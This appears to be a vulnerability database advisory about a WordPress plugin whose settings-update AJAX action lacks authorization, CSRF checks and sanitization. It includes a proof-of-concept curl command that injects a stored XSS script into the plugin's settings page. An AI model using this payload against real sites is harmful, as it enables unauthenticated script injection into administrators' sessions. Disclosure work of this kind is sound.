The plugin does not have authorization and CSRF checks on a specific action handler, as well as does not sanitize its settings, which enables an unauthenticated attacker to inject malicious XSS payloads into the settings page of the plugin.
curl https://example.com/wp-admin/admin-ajax.php --data 'action=wcu-update-text&option=wcusage_field_orders&value="></input><script>alert("xss");</script><input' The XSS will be triggered in the Settings page of the plugin (/wp-admin/admin.php?page=wcusage_settings)
cydave
cydave
Yes
2022-03-02 (about 4 months ago)
2022-03-02 (about 4 months ago)
2022-04-08 (about 2 months ago)